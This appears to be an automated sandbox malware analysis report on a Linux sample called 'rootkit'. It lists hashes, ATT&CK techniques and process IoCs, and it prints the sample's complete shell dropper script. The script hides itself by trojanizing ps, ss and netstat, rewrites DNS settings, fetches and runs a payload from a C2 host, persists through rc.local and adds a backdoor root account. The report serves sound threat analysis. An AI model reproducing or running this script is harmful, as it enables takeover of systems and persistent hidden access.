c858e10e29b769ca86445ba1bebdf708e88245da4e96c4afc967818e8293e099

Resubmissions

02-01-2025 21:33

250102-1ejbvswpcv 10

08-12-2024 01:12

241208-bkq68azkep 10

Analysis

max time kernel
149s
max time network
146s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
02-01-2025 21:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rootkit
Size

357KB
MD5

80b21dcc410fcd97098e8b804ba1dd27
SHA1

8eab144db8af9bfb3c633b373489c6799f2ad5cf
SHA256

548d1e891b2837e28c6e495fd1e5788ab650d169c53ade1f0cadf005d8657316
SHA512

7f8a5335a0b37bf760825c00fb0b685f85bebed212533c725748e3cafd8f4e79fa09e1b152bb7612ee1091bed49f35aa728a5f42e775bc80788535c16e34a60d
SSDEEP

6144:4LZVne1+4AtZTefDUuipumMP+tjwPn2OFfRA/7pmuxEkV3ufBrCkRNcl4/YGA/u:4dVne09J8UbpumMP+tjwPn22pAjN3ufv

Score

8^/10

antivm credential_access defense_evasion discovery persistence

Malware Config

Signatures

Modifies password files for system users/ groups 1 TTPs 2 IoCs

Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.

persistence credential_access defense_evasion

Pluggable Authentication Modules

T1556.003

description	ioc	Process
File opened for modification	/etc/passwd	sh
File opened for modification	/etc/shadow	sh

File and Directory Permissions Modification 1 TTPs 45 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
2725	chmod
2867	sh
2888	chmod
2894	chmod
3069	chmod
2703	chmod
2487	chmod
2508	chmod
2585	chmod
2592	chmod
2639	chmod
2642	chmod
2731	chmod
2481	sh
3045	sh
3063	chmod
3072	chmod
2979	chmod
2593	chmod
2637	chmod
2719	chmod
3044	chmod
2502	chmod
2878	chmod
2488	chmod
2499	chmod
2704	sh
2775	chmod
2816	chmod
2866	chmod
2891	chmod
2495	chmod
2716	chmod
2722	chmod
2885	chmod
2938	chmod
3060	chmod
2505	chmod
3056	chmod
3066	chmod
2728	chmod
2819	chmod
2882	chmod
2982	chmod
2584	chmod

Executes dropped EXE 64 IoCs

ioc	pid	Process
/usr/bin/lockr	2489	lockr
/usr/bin/lockr	2490	lockr
/usr/bin/lockr	2491	lockr
/usr/bin/lockr	2496	lockr
/usr/bin/lockr	2497	lockr
/usr/bin/lockr	2498	lockr
/usr/bin/lockr	2500	lockr
/usr/bin/lockr	2501	lockr
/usr/bin/lockr	2503	lockr
/usr/bin/lockr	2504	lockr
/usr/bin/lockr	2506	lockr
/usr/bin/lockr	2507	lockr
/usr/bin/lockr	2509	lockr
/usr/bin/lockr	2518	lockr
/usr/bin/lockr	2519	lockr
/usr/bin/lockr	2542	lockr
/usr/bin/lockr	2543	lockr
/usr/bin/lockr	2544	lockr
/usr/bin/lockr	2580	lockr
/usr/bin/lockr	2586	lockr
/usr/bin/lockr	2587	lockr
/usr/bin/lockr	2588	lockr
/usr/bin/lockr	2594	lockr
/usr/bin/lockr	2595	lockr
/usr/bin/lockr	2596	lockr
/usr/bin/lockr	2598	lockr
/usr/bin/lockr	2599	lockr
/usr/bin/lockr	2601	lockr
/usr/bin/ips	2607	ips
/usr/bin/lockr	2611	lockr
/usr/bin/lockr	2612	lockr
/usr/bin/dget	2614	dget
/usr/bin/lockr	2623	lockr
/usr/bin/lockr	2624	lockr
/usr/bin/lockr	2629	lockr
/usr/bin/lockr	2631	lockr
/usr/bin/lockr	2635	lockr
/usr/bin/lockr	2636	lockr
/usr/bin/lockr	2638	lockr
/usr/bin/lockr	2643	lockr
/usr/bin/lockr	2648	lockr
/usr/bin/lockr	2656	lockr
/usr/bin/lockr	2657	lockr
/usr/bin/lockr	2672	lockr
/usr/bin/lockr	2673	lockr
/usr/bin/lockr	2677	lockr
/usr/bin/lockr	2678	lockr
/usr/bin/lockr	2681	lockr
/usr/bin/lockr	2683	lockr
/usr/bin/lockr	2684	lockr
/usr/bin/lockr	2686	lockr
/usr/bin/lockr	2688	lockr
/usr/bin/lockr	2689	lockr
/usr/bin/lockr	2691	lockr
/usr/bin/lockr	2692	lockr
/usr/bin/lockr	2693	lockr
/usr/bin/lockr	2695	lockr
/usr/bin/lockr	2696	lockr
/usr/bin/lockr	2697	lockr
/usr/bin/lockr	2699	lockr
/usr/bin/lockr	2701	lockr
/usr/bin/lockr	2705	lockr
/usr/bin/f24a684025	2704	f24a684025
/usr/bin/lockr	2706	lockr

OS Credential Dumping 1 TTPs 4 IoCs

Adversaries may attempt to dump credentials to use it in password cracking.

credential_access

/etc/passwd and /etc/shadow

T1003.008

description	ioc	Process
File opened for reading	/etc/shadow	lockr
File opened for reading	/etc/shadow	cat
File opened for reading	/etc/shadow	cat
File opened for reading	/etc/shadow	cat

Unexpected DNS network traffic destination 28 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114

Writes DNS configuration 1 TTPs 4 IoCs

Writes data to DNS resolver config file.

Adversary-in-the-Middle

T1557

description	ioc	Process
File opened for modification	/etc/resolv.conf	sh
File opened for modification	/etc/resolv.conf	sh
File opened for modification	/etc/resolv.conf	sh
File opened for modification	/etc/resolv.conf	sh

Enumerates running processes
Discovers information about currently running processes on the system

Modifies rc script 2 TTPs 1 IoCs

Adding/modifying system rc scripts is a common persistence mechanism.

persistence

Boot or Logon Autostart Execution

T1547

RC Scripts

T1037.004

description	ioc	Process
File opened for modification	/etc/rc.local	sh

Write file to user bin folder 13 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/bin/f24a684025	cp
File opened for modification	/usr/bin/15cd17e5d6	cp
File opened for modification	/usr/bin/.locks	cp
File opened for modification	/usr/bin/dget	cp
File opened for modification	/usr/bin/dpkgd/ss	cp
File opened for modification	/usr/bin/iss	cp
File opened for modification	/usr/bin/ips	cp
File opened for modification	/usr/bin/fd7c90b56a	cp
File opened for modification	/usr/bin/lockr	cp
File opened for modification	/usr/bin/lockr	cp
File opened for modification	/usr/bin/.bget	cp
File opened for modification	/usr/bin/dget	cp
File opened for modification	/usr/bin/dpkgd/ps	cp

Writes file to system bin folder 8 IoCs

description	ioc	Process
File opened for modification	/bin/seduIfs9P	sed
File opened for modification	/bin/sedoF9q9j	sed
File opened for modification	/bin/ps	sh
File opened for modification	/bin/sedE9gGVy	sed
File opened for modification	/bin/ss	sh
File opened for modification	/bin/sedYEJ9kh	sed
File opened for modification	/bin/sedFL1YEw	sed
File opened for modification	/bin/ss	sh

Checks CPU configuration 1 TTPs 3 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	ips
File opened for reading	/proc/cpuinfo	ips
File opened for reading	/proc/cpuinfo	ips

Reads CPU attributes 1 TTPs 20 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/possible	ips
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	ips
File opened for reading	/sys/devices/system/cpu/possible	ips
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/possible	pkill
File opened for reading	/sys/devices/system/cpu/online	nslookup
File opened for reading	/sys/devices/system/cpu/online	nslookup

Enumerates kernel/hardware configuration 1 TTPs 9 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	ips
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	ips
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	ips
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill
File opened for reading	/sys/devices/system/node	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/15/ctty	pkill
File opened for reading	/proc/193/stat	pkill
File opened for reading	/proc/40/stat	ips
File opened for reading	/proc/47/ctty	pkill
File opened for reading	/proc/432/stat	pkill
File opened for reading	/proc/822/cgroup	pkill
File opened for reading	/proc/1939/cmdline	pkill
File opened for reading	/proc/2133/cmdline	pkill
File opened for reading	/proc/383	killall
File opened for reading	/proc/1770/status	pkill
File opened for reading	/proc/79/stat	killall
File opened for reading	/proc/510/cmdline	killall
File opened for reading	/proc/2227/cgroup	pkill
File opened for reading	/proc/63/stat	ips
File opened for reading	/proc/51	killall
File opened for reading	/proc/39/ctty	pkill
File opened for reading	/proc/39	killall
File opened for reading	/proc/196	killall
File opened for reading	/proc/2295/stat	ips
File opened for reading	/proc/48/stat	ips
File opened for reading	/proc/1672/status	ips
File opened for reading	/proc/27/status	pkill
File opened for reading	/proc/738/stat	ips
File opened for reading	/proc/26/stat	pkill
File opened for reading	/proc/13/cmdline	pkill
File opened for reading	/proc/510/cmdline	pkill
File opened for reading	/proc/2240/cgroup	pkill
File opened for reading	/proc/1993/status	ips
File opened for reading	/proc/12/cgroup	pkill
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/30/status	pkill
File opened for reading	/proc/1672/stat	pkill
File opened for reading	/proc/1130/ctty	ips
File opened for reading	/proc/2271/cgroup	pkill
File opened for reading	/proc/1073/cmdline	ips
File opened for reading	/proc/2545/ctty	ips
File opened for reading	/proc/896/cmdline	pkill
File opened for reading	/proc/199/status	pkill
File opened for reading	/proc/2254	killall
File opened for reading	/proc/2236/stat	killall
File opened for reading	/proc/9/status	pkill
File opened for reading	/proc/2785/stat	ips
File opened for reading	/proc/1949/ctty	ips
File opened for reading	/proc/1074/cgroup	pkill
File opened for reading	/proc/197/stat	pkill
File opened for reading	/proc/21/stat	pkill
File opened for reading	/proc/194/ctty	ips
File opened for reading	/proc/8	killall
File opened for reading	/proc/2479/cmdline	killall
File opened for reading	/proc/1088/cgroup	pkill
File opened for reading	/proc/1	killall
File opened for reading	/proc/1805/ctty	pkill
File opened for reading	/proc/1939/cgroup	pkill
File opened for reading	/proc/275	killall
File opened for reading	/proc/52/cmdline	pkill
File opened for reading	/proc/2151/stat	pkill
File opened for reading	/proc/32/ctty	pkill
File opened for reading	/proc/2295	killall
File opened for reading	/proc/38/ctty	pkill
File opened for reading	/proc/1940/cgroup	pkill
File opened for reading	/proc/195	killall
File opened for reading	/proc/25/stat	ips
File opened for reading	/proc/389/ctty	pkill
File opened for reading	/proc/738	killall

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
2785	ips
2948	ips
2591	cp
2595	lockr
2607	ips

/tmp/rootkit
/tmp/rootkit
1⤵
PID:2481

/bin/sh
/tmp/rootkit -c "exec '/tmp/rootkit' \"\$@\"" /tmp/rootkit
1⤵
PID:2481

/tmp/rootkit
/tmp/rootkit
1⤵
PID:2481

/bin/sh
/tmp/rootkit -c "#!/bin/sh path=`pwd` exit0=\"exit 0\" ips=\"/usr/bin/ips\" iss=\"/usr/bin/iss\" Net=\"/usr/bin/nets\" Get=\"/usr/bin/dget\" Lok=\"/usr/bin/lockr\" deny=\"/etc/deny.bak\" allow=\"/etc/allow.bak\" Config=\"/etc/long.conf\" filebak=\"/usr/bin/longbak\" issbak=\"/usr/bin/dpkgd/ss\" ipsbak=\"/usr/bin/dpkgd/ps\" Netbak=\"/usr/bin/dpkgd/netstat\" Runkillallconnect() { killpid=`nets -anept 2>/dev/null|grep \"\$Address:9506\"|cut -d / -f 1|awk '{print \$9}'` kill \$killpid 2>/dev/null;kill -3 \$killpid 2>/dev/null;kill -9 \$killpid 2>/dev/null killall \$tempfile;pkill \$tempfile;lockr -i /usr/bin/;lockr -i \$filetemp;rm -f \$filetemp if [ -z \"`cat \$Config|grep \$tempfile`\" ]; then lockr -i /etc/init.d/;lockr -i \$Config echo \$filename \$tempbash \$Address > \$Config;lockr +i \$Config >/dev/null 2>&1 else lockr -i \$Config;sed -i \"s|\$tempfile|\$filename|\" \$Config;lockr +i \$Config >/dev/null 2>&1 fi if [ -z \"`cat /bin/ps|grep \$tempfile`\" ]; then lockr -i /bin/;lockr -i /bin/ps;echo '#!/bin/sh' > /bin/ps;echo 'for arg in \"\$*\";do' >> /bin/ps echo 'ips \$arg|grep -v \"'\$tempbash'\"|grep -v \"'\$filename'\"|grep -v \"ips\"|grep -v \"grep\"' >> /bin/ps echo 'done;exit' >> /bin/ps;chmod 777 /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 else lockr -i /bin/ps;sed -i \"s|\$tempfile|\$filename|\" /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 fi } # ------------------------------------------------------------- if [ ! -f \"\$Lok\" ];then lockr -i /usr/bin/ if [ ! -f /usr/bin/wget ];then if [ -f /usr/bin/yum ];then yum -y install e2fsprogs;fi if [ -f /usr/bin/apt-get ];then apt-get -y install e2fsprogs;fi fi cp -f /usr/bin/chattr /usr/bin/lockr cp -f /usr/bin/chattr /usr/bin/.locks cp -f /usr/bin/.locks /usr/bin/lockr chmod 777 /usr/bin/lockr chmod 777 /usr/bin/.locks lockr +i /usr/bin/lockr >/dev/null 2>&1 lockr +i /usr/bin/.locks >/dev/null 2>&1 else .locks -i /usr/bin/lockr;chmod 777 /usr/bin/lockr lockr +i /usr/bin/lockr >/dev/null 2>&1 fi if [ ! -f \"\$Get\" ];then lockr -i /usr/bin/ if [ ! -f /usr/bin/wget ];then if [ -f /usr/bin/yum ];then yum -y install wget;fi if [ -f /usr/bin/apt-get ];then apt-get -y install wget;fi fi cp -f /usr/bin/wget /usr/bin/dget cp -f /usr/bin/wget /usr/bin/.bget cp -f /usr/bin/.bget /usr/bin/dget chmod 777 /usr/bin/dget lockr +i /usr/bin/dget >/dev/null 2>&1 lockr +i /usr/bin/.bget >/dev/null 2>&1 else lockr -i /usr/bin/dget;chmod 777 /usr/bin/dget lockr +i /usr/bin/dget >/dev/null 2>&1 fi if [ -f /usr/bin/pkill ];then lockr -i /usr/bin/pkill;chmod 777 /usr/bin/pkill lockr +i /usr/bin/pkill >/dev/null 2>&1 fi if [ -f /usr/bin/nohup ];then lockr -i /usr/bin/nohup;chmod 777 /usr/bin/nohup lockr +i /usr/bin/nohup >/dev/null 2>&1 fi if [ -f /usr/bin/killall ];then lockr -i /usr/bin/killall;chmod 777 /usr/bin/killall lockr +i /usr/bin/killall >/dev/null 2>&1 fi if [ -f /usr/bin/nslookup ];then lockr -i /usr/bin/nslookup;chmod 777 /usr/bin/nslookup lockr +i /usr/bin/nslookup >/dev/null 2>&1 fi if [ -f /etc/init.d/Me8ing.conf ];then Runkillallconnect rm -f \$0;exit fi # ------------------------------------------------------------- if [ ! -f \"\$Config\" ];then intranet=`ifconfig|grep 'inet '|grep -v '127.0'|xargs|awk -F '[ :]' '{print \$3}'|grep '192.168'` if [ \$intranet ];then exit;fi lockr -i /usr/bin/;lockr -i /etc/init.d/ echo \"byicnanker 2228668564\" > \$Config tempfile=`cat \$Config | awk '{print \$1}'` filetemp=\"/usr/bin/\$tempfile\" #��·�� filename=`date +%s%N | md5sum | head -c 10` filepath=\"/usr/bin/\$filename\" #��·�� tempbash=`cat \$Config | awk '{print \$2}'` bashtemp=\"/usr/bin/\$tempbash\" #�ֽű�·�� bashname=`date +%s%N | md5sum | head -c 10` bashpath=\"/usr/bin/\$bashname\" #�½ű�·�� else tempfile=`cat \$Config | awk '{print \$1}'` filetemp=\"/usr/bin/\$tempfile\" #��·�� filename=`date +%s%N | md5sum | head -c 10` filepath=\"/usr/bin/\$filename\" #��·�� tempbash=`cat \$Config | awk '{print \$2}'` bashtemp=\"/usr/bin/\$tempbash\" #�ֽű�·�� bashname=`date +%s%N | md5sum | head -c 10` bashpath=\"/usr/bin/\$bashname\" #�½ű�·�� if [ \$0 != \"\$bashtemp\" ];then lockr -i /usr/bin/;lockr -i /bin/ KA=`cat \$Config | awk '{print \$1}'` KPidA=`ips -ef|grep \$KA|awk '{print \$2}'` lockr -i /usr/bin/\$KA;rm -f /usr/bin/\$KA kill \$KPidA 2>/dev/null;kill -9 \$KPidA 2>/dev/null lockr -i \$filetemp;rm -f \$filetemp;lockr -i \$filebak;rm -f \$filebak killall .sshd;pkill .sshd;lockr -i /usr/bin/.sshd;rm -f /usr/bin/.sshd killall \$KA;pkill \$KA;killall \$KA;pkill \$KA;sleep 0.1 K1=`cat \$Config | awk '{print \$2}'` KPid1=`ips -ef|grep \$K1|awk '{print \$2}'` kill \$KPid1 2>/dev/null;kill -9 \$KPid1 2>/dev/null lockr -i /usr/bin/\$K1;rm -f /usr/bin/\$K1 killall \$K1;pkill \$K1;killall \$K1;pkill \$K1;sleep 0.4 K2=`cat \$Config | awk '{print \$2}'` KPid2=`ips -ef|grep \$K2|awk '{print \$2}'` kill \$KPid2 2>/dev/null;kill -9 \$KPid2 2>/dev/null lockr -i /usr/bin/\$K2;rm -f /usr/bin/\$K2 killall \$K2;pkill \$K2;killall \$K2;pkill \$K2;sleep 1.2 K3=`cat \$Config | awk '{print \$2}'` KPid3=`ips -ef|grep \$K3|awk '{print \$2}'` kill \$KPid3 2>/dev/null;kill -9 \$KPid3 2>/dev/null lockr -i /usr/bin/\$K3;rm -f /usr/bin/\$K3 killall \$K3;pkill \$K3;killall \$K3;pkill \$K3;sleep 0.5 K4=`cat \$Config | awk '{print \$2}'` KPid4=`ips -ef|grep \$K4|awk '{print \$2}'` kill \$KPid4 2>/dev/null;kill -9 \$KPid4 2>/dev/null lockr -i /usr/bin/\$K4;rm -f /usr/bin/\$K4 killall \$K4;pkill \$K4;killall \$K4;pkill \$K4;sleep 1.3 K5=`cat \$Config | awk '{print \$2}'` KPid5=`ips -ef|grep \$K5|awk '{print \$2}'` kill \$KPid5 2>/dev/null;kill -9 \$KPid5 2>/dev/null lockr -i /usr/bin/\$K5;rm -f /usr/bin/\$K5 killall \$K5;pkill \$K5;killall \$K5;pkill \$K5;sleep 0.6 K6=`cat \$Config | awk '{print \$2}'` KPid6=`ips -ef|grep \$K6|awk '{print \$2}'` kill \$KPid6 2>/dev/null;kill -9 \$KPid6 2>/dev/null lockr -i /usr/bin/\$K6;rm -f /usr/bin/\$K6 killall \$K6;pkill \$K6;killall \$K6;pkill \$K6;sleep 1.4 K7=`cat \$Config | awk '{print \$2}'` KPid7=`ips -ef|grep \$K7|awk '{print \$2}'` kill \$KPid7 2>/dev/null;kill -9 \$KPid7 2>/dev/null lockr -i /usr/bin/\$K7;rm -f /usr/bin/\$K7 killall \$K7;pkill \$K7;killall \$K7;pkill \$K7;sleep 0.1 lockr -i \$Config;sed -i \"s|\$tempbash|\$bashname|\" \$Config lockr -i /bin/ps;sed -i \"s|\$tempbash|\$bashname|\" /bin/ps fi fi # ------------------------------------------------------------- if [ ! -f /usr/bin/nslookup ];then if [ -f /usr/bin/apt-get ];then apt-get -y install dnsutils;fi if [ -f /usr/bin/yum ];then yum -y install bind-utils;fi fi ResolveIP=`nslookup top.t7ux.com|grep \"Address: \"|awk '{print \$2}'` if [ -z \"\$ResolveIP\" ];then lockr -i /etc/;lockr -i /etc/resolv.conf echo 'nameserver 114.114.114.114' > /etc/resolv.conf echo 'nameserver 8.8.8.8' >> /etc/resolv.conf echo 'nameserver 8.8.4.4' >> /etc/resolv.conf lockr +i /etc/resolv.conf >/dev/null 2>&1 service network restart;sleep 1 Address=`nslookup top.t7ux.com|grep \"Address: \"|awk '{print \$2}'` else Address=\"\$ResolveIP\" fi # ------------------------------------------------------------- if [ -f /bin/ss ];then if [ ! -f \"\$iss\" ];then if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/ss \$issbak cp -f /bin/ss \$iss else cp -f \$issbak \$iss fi chmod 777 \$iss;chmod 777 \$issbak lockr +i \$issbak >/dev/null 2>&1 lockr +i \$iss >/dev/null 2>&1 else if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;cp -f \$iss \$issbak lockr +i \$issbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/ss | grep \$Address`\" ]; then lockr -i /bin/;lockr -i /bin/ss echo '#!/bin/sh' > /bin/ss echo 'iss|grep -v \"'\$Address'\"' >> /bin/ss echo 'exit' >> /bin/ss chmod 777 /bin/ss;lockr +i /bin/ss >/dev/null 2>&1 fi fi fi if [ -f /usr/sbin/ss ];then if [ ! -f \"\$iss\" ];then if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /usr/sbin/ss \$issbak cp -f /usr/sbin/ss \$iss else cp -f \$issbak \$iss fi chmod 777 \$iss;chmod 777 \$issbak lockr +i \$issbak >/dev/null 2>&1 lockr +i \$iss >/dev/null 2>&1 else if [ ! -f \"\$issbak\" ];then lockr -i /usr/bin/;cp -f \$iss \$issbak lockr +i \$issbak >/dev/null 2>&1 fi if [ -z \"`cat /usr/sbin/ss | grep \$Address`\" ]; then lockr -i /usr/sbin/;lockr -i /usr/sbin/ss echo '#!/bin/sh' > /usr/sbin/ss echo 'iss|grep -v \"'\$Address'\"' >> /usr/sbin/ss echo 'exit' >> /usr/sbin/ss chmod 777 /usr/sbin/ss;lockr +i /usr/sbin/ss >/dev/null 2>&1 fi fi fi if [ -f /bin/netstat ];then if [ ! -f \"\$Net\" ];then if [ ! -f \"\$Netbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/netstat \$Netbak cp -f /bin/netstat \$Net else cp -f \$Netbak \$Net fi chmod 777 \$Net;chmod 777 \$Netbak lockr +i \$Netbak >/dev/null 2>&1 lockr +i \$Net >/dev/null 2>&1 else if [ ! -f \"\$Netbak\" ];then lockr -i /usr/bin/;cp -f \$Net \$Netbak lockr +i \$Netbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/netstat | grep \$Address`\" ]; then lockr -i /bin/;lockr -i /bin/netstat echo '#!/bin/sh' > /bin/netstat echo 'for arg in \"\$*\";do' >> /bin/netstat echo 'nets \$arg | grep -v \"'\$Address'\"' >> /bin/netstat echo 'done;exit' >> /bin/netstat chmod 777 /bin/netstat;lockr +i /bin/netstat >/dev/null 2>&1 fi fi fi if [ -f /bin/ps ];then if [ ! -f \"\$ips\" ];then if [ ! -f \"\$ipsbak\" ];then lockr -i /usr/bin/;mkdir /usr/bin/dpkgd/ cp -f /bin/ps \$ipsbak cp -f /bin/ps \$ips else cp -f \$ipsbak \$ips fi chmod 777 \$ips;chmod 777 \$ipsbak lockr +i \$ipsbak >/dev/null 2>&1 lockr +i \$ips >/dev/null 2>&1 else if [ ! -f \"\$ipsbak\" ];then lockr -i /usr/bin/;cp -f \$ips \$ipsbak lockr +i \$ipsbak >/dev/null 2>&1 fi if [ -z \"`cat /bin/ps | grep '#!/bin/sh'`\" ]; then lockr -i /bin/;lockr -i /bin/ps echo '#!/bin/sh' > /bin/ps;echo 'for arg in \"\$*\";do' >> /bin/ps echo 'ips \$arg | grep -v \"'\$tempbash'\" | grep -v \"'\$tempfile'\" | grep -v \"ips\" | grep -v \"grep\"' >> /bin/ps echo 'done;exit' >> /bin/ps;chmod 777 /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 fi fi fi if [ ! -f \"\$deny\" ];then lockr -i /etc/;cp -f /etc/hosts.deny \$deny lockr +i \$deny >/dev/null 2>&1 fi if [ ! -f \"\$allow\" ];then lockr -i /etc/;cp -f /etc/hosts.allow \$allow lockr +i \$allow >/dev/null 2>&1 fi # by icnanker ----------------------------------------------- iptable=`iptables -L INPUT | grep \"\$Address\" | grep 'ACCEPT'` if [ -z \"\$iptable\" ];then iptables -I INPUT -s \$Address -j ACCEPT else iptables -D INPUT -s \$Address -j DROP fi process=`ips -ef | grep \"\$tempfile\" | grep -v \"grep\" | wc -l` if [ \$process != 1 ];then if [ ! -f \"\$filebak\" ];then lockr -i /usr/bin/;lockr -i /usr/bin/Drkv;rm -f /usr/bin/Drkv cd /usr/bin/;dget http://\$Address:6513/Drkv cd \$path;mv -f /usr/bin/Drkv \$filepath else cp -f \$filebak \$filepath fi Runkillallconnect chmod 777 \$filepath nohup \$filepath >/dev/null 2>&1 & fi if [ ! -f \"\$filebak\" ];then cp -f \$filepath \$filebak;chmod 777 \$filebak lockr +i \$filebak >/dev/null 2>&1 fi # by icnanker ----------------------------------------------- Repeatstart=`cat /etc/rc.local | grep 'start'| wc -l` if [ \$Repeatstart != 1 ];then lockr -i /etc/rc.local;sed -i '/start/d' /etc/rc.local fi if [ -z \"`cat /etc/rc.local | grep \"\$bashtemp\"`\" ]; then if [ -z \"`cat /etc/rc.local | grep \"\$exit0\"`\" ]; then lockr -i /etc/;lockr -i /etc/rc.local echo \"\$bashpath start\" >> /etc/rc.local else lockr -i /etc/;lockr -i /etc/rc.local sed -i \"s|exit 0|\$bashpath start|\" /etc/rc.local echo \"exit 0\">>/etc/rc.local fi fi # by icnanker ----------------------------------------------- if [ ! -f /tmp/bash.log ];then UpdateIP=`nslookup sh.7ex.me|grep \"Address: \"|awk '{print \$2}'` if [ ! -z \"\$UpdateIP\" ];then lockr -i /tmp/;lockr -i /tmp/bash.log;rm -f /tmp/bash.log cd /tmp/;dget http://\$UpdateIP:5155/update.log cd \$path;mv -f /tmp/update.log /tmp/bash.log fi fi if [ -z \"`cat /etc/passwd|grep \"icnanker\"`\" ]; then lockr -i /etc/;lockr -i /etc/passwd #icnanker echo 'icnanker:x:0:1:icnanker:/root:/bin/bash' >> /etc/passwd fi if [ -z \"`cat /etc/shadow|grep \"icnanker\"`\" ]; then lockr -i /etc/;lockr -i /etc/shadow #ddos@nanker echo 'icnanker:\$6\$14nPldFS\$xcNbGMouKo..dH8idyM6D0RIpXVnVm.5B.qORnV6qqnW4V.Ru3IGGyhiNzKAWRee7hJtCXW8vhApM1bzAm54n.:16570:0:99999:7:::' >> /etc/shadow fi # by icnanker ----------------------------------------------- killall .sshd;pkill .sshd;lockr -i /usr/bin/.sshd;rm -f /usr/bin/.sshd lockr -i /usr/bin/;lockr -i /usr/bin/wget;rm -f /usr/bin/wget;lockr -i /usr/bin/chattr;rm -f /usr/bin/chattr lockr -i /etc/;lockr -i /etc/hosts.deny;cp -f \$deny /etc/hosts.deny;lockr +i /etc/hosts.deny >/dev/null 2>&1 lockr -i /etc/;lockr -i /etc/hosts.allow;cp -f \$allow /etc/hosts.allow;lockr +i /etc/hosts.allow >/dev/null 2>&1 lockr -i /etc/init.d/;lockr -i \$Config;sed -i \"s|\$tempbash|\$bashname|\" \$Config;lockr +i \$Config >/dev/null 2>&1 sleep 1;lockr -i /usr/bin/;cp -f \$0 \$bashpath;chmod 777 \$bashpath;nohup \$bashpath >/dev/null 2>&1 & lockr -i /bin/;lockr -i /bin/ps;sed -i \"s|\$tempbash|\$bashname|\" /bin/ps;lockr +i /bin/ps >/dev/null 2>&1 lockr -i /etc/;lockr -i /etc/rc.local;sed -i \"s|\$bashtemp start|\$bashpath start|\" /etc/rc.local # by icnanker ----------------------------------------------- lockr -i \$0 rm -f \$0 exit" /tmp/rootkit
1⤵
- Modifies password files for system users/ groups
- File and Directory Permissions Modification
- Writes DNS configuration
- Modifies rc script
- Writes file to system bin folder
PID:2481
- /usr/bin/cp
  cp -f /usr/bin/chattr /usr/bin/lockr
  2⤵
  - Write file to user bin folder
  PID:2484
- /usr/bin/cp
  cp -f /usr/bin/chattr /usr/bin/.locks
  2⤵
  - Write file to user bin folder
  PID:2485
- /usr/bin/cp
  cp -f /usr/bin/.locks /usr/bin/lockr
  2⤵
  - Write file to user bin folder
  PID:2486
- /usr/bin/chmod
  chmod 777 /usr/bin/lockr
  2⤵
  - File and Directory Permissions Modification
  PID:2487
- /usr/bin/chmod
  chmod 777 /usr/bin/.locks
  2⤵
  - File and Directory Permissions Modification
  PID:2488
- /usr/bin/lockr
  lockr +i /usr/bin/lockr
  2⤵
  - Executes dropped EXE
  PID:2489
- /usr/bin/lockr
  lockr +i /usr/bin/.locks
  2⤵
  - Executes dropped EXE
  PID:2490
- /usr/bin/lockr
  lockr -i /usr/bin/
  2⤵
  - Executes dropped EXE
  PID:2491
- /usr/bin/cp
